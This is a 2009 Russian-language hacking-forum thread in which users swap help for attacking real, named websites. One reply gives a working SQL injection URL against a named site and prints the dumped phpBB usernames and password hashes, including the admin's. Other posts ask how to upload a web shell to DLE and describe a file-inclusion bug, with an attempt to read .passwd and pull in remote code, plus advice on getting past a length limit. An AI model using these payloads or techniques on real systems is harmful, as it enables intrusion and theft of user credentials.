ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.04.2009, 22:44
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
забыл каким образом можно выводит все содержание папки , а не пользуясь LIMIT 1,1 .....
|
|
|
04.04.2009, 22:51
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
2 Saiga
Можно воспользуватся функцией group_concat()
Код:
http://www.so-znanie.com/index.php?id=-8+union+all+select+1,2,group_concat(concat_ws(0x3a3a,username,user_password))+from+phpbb_users--
Код:
Anonymous::,admin::$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21,AdsBot [Google]::,Alexa [Bot]::,Alta Vista [Bot]::,Ask Jeeves [Bot]::,Baidu [Spider]::,Exabot [Bot]::,FAST Enterprise [Crawler]::,FAST WebCrawler [Crawler]::,Francis [Bot]::,Gigabot [Bot]::,Google Adsense [Bot]::,Google Desktop::,Google Feedfetcher::,Google [Bot]::,Heise IT-Markt [Crawler]::,Heritrix [Crawler]::,IBM Research [Bot]::,ICCrawler - ICjobs::,ichiro [Crawler]::,Majestic-12 [Bot]::,Metager [Bot]::,MSN NewsBlogs::,MSN [Bot]::,MSNbot Media::,NG-Search [Bot]::,Nutch [Bot]::,Nutch/CVS [Bot]::,OmniExplorer [Bot]::,Online link [Validator]::,psbot [Picsearch]::,Seekport [Bot]::,Sensis [Crawler]::,SEO Crawler::,Seoma [Crawler]::,SEOSearch [Crawler]::,Snappy [Bot]::,Steeler [Crawler]::,Synoo [Bot]::,Telekom [Bot]::,TurnitinBot [Bot]::,Voyager [Bot]::,W3 [Sitesearch]::,W3C [Linkcheck]::,W3C [Validator]::,WiseNut [Bot]::,YaCy [Bot]::,Yahoo MMCrawler [Bot]::,Yahoo Slurp [Bot]::,Yahoo [Bot]::,YahooSeeker [Bot]::,Виталий::$H$9hSsjxJ2UF5iUD8kzntbWpyPoXfE
Там ботов больше чем людей =))
Последний раз редактировалось -m0rgan-; 04.04.2009 в 22:56..
|
|
|
|
04.04.2009, 22:57
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
group_concat() всех не выведеш
|
|
|
|
04.04.2009, 23:43
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Дорогие отвечающие на вопросы!!!
Я уже несколько раз говорил, что если уж вы отвечаете на вопросы не надо писать ОХИНЕЮ и разводить флуд и оффтоп на 15 страниц.
Человек искал админку ат сайта, имея пасс от него. Вот пост НОРМАЛЬНОГО ответа по теме:
Сообщение от DimOnOID
Код:
http://so-znanie.com/backend/main.php
И весь этот ОФФТОП на несколько страниц, а результата нет и не предвидится.
И так по каждому вопросу. На будующее, такую бессмысленную активность буду расценивать как флуд и набивание постов и реагировать на неё согласно правилам форума.
Сюда-же попадает ОХИНЕЯ, которую некоторые несут с завидной регулярностью.
Если вы не уверены в ответе, отвечать НЕ НУЖНО.
Если человек просит подсказать есть ли скуль, НЕ НАДО писать, что там расскрытие пути, сдесь нет слепых юзеров. Не надо сюда копипастить милворм, в лучшем случае ссылку на сплоит. Не надо показавать свою некомпетентность, я вам со всей ответственностью могу заявить, что такого рода активность не пойдёт вам в зачёт, она напротив только показывает отсутствие знаний.
Надеюсь , что все меня поняли правильно, утопить топик во флуде я не дам, весь оффтоп буду жестко пресекать
Спасибо за внимание
|
|
|
|
05.04.2009, 02:22
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077
Репутация:
93
|
|
челы резко встал вопрос залития шелла в dle
1. изменил тип файлов, залил через новость.. но я незнаю названия файла..
2. через шаблон пхп не исполняется..
подскажи еще способы.. очень прошу - нужно!
|
|
|
|
05.04.2009, 17:23
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 44
Провел на форуме:
289239
Репутация:
32
|
|
народ, помогите.
есть сайт www.sait.ru
скрипт www.sait.ru/text.php имхо бажный. методом GET передаются два параметра p & n
генерация страницы просиходит примерно следующим образом
$path = substr($_GET['p'],0,8)."/".substr($_GET['n'],0,8).'.htm';
///
$x = fopen($path, 'w');
///
require($path);
если в корне лежит title.htm, то при www.sait.ru/text.php?p=news&n=../title
выведет ее.
одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти?? в корне также лежит .passwd Никак не могу его вывести, т.к. он считает и %00, и название файла получается больше 8 символов, это бесит.. я не знаю как убрать слеш, чтоб ввести название двумя параметрами... Также не могу исполнить там свой скрипт с другого хоста.. пробовал www.sait.ru/text.php?p=http:/&n=moysait.ru/code.php%00
но никак не укладываюсь в 8 символов.
заранее спасибо
|
|
|
|
05.04.2009, 17:44
|
|
Постоянный
Регистрация: 24.03.2009
Сообщений: 670
Провел на форуме:
2868783
Репутация:
414
|
|
одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти??
никак.
|
|
|
|
05.04.2009, 18:21
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235
Репутация:
39
|
|
joks, у тебя ведь 2 параметра? если так, то
пусть p = http:/
n = abc.ru/a
тогда path = http://abc.ru/a.htm
осталось найти трехбуквенник ру
|
|
|
|
05.04.2009, 18:54
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
|
|
|
|
05.04.2009, 19:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
.:[melkiy]:. нет, либо утилитами,очень редко на сайте где уязвимость выводятся вся инфа без использования лимита
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1208926){kind=avatar}
Похожие темы
Линейный вид
